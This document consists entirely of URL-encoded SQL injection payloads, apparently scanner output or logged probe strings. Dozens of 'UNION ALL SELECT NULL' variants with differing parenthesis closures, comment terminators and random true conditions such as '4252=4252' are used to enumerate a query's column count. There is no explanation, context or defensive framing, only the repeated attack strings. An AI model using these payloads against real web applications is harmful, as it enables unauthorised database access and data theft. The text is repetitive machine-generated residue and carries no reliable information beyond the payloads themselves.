1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%284252%3D4252 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%285752%3D5752 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289241%3D9241 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%287248%3D7248 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289659%3D9659 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%285071%3D5071 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%283159%3D3159 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%285860%3D5860 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288034%3D8034 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281083%3D1083 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282820%3D2820 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283354%3D3354 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%286888%3D6888 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%288414%3D8414 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%286518%3D6518 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282853%3D2853 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%284600%3D4600 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%285153%3D5153 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283932%3D3932 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%284410%3D4410 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%287282%3D7282 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%289388%3D9388 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%288674%3D8674 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%282541%3D2541 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%282426%3D2426 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%281231%3D1231 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%289894%3D9894 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283451%3D3451 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%286569%3D6569 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%286643%3D6643 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 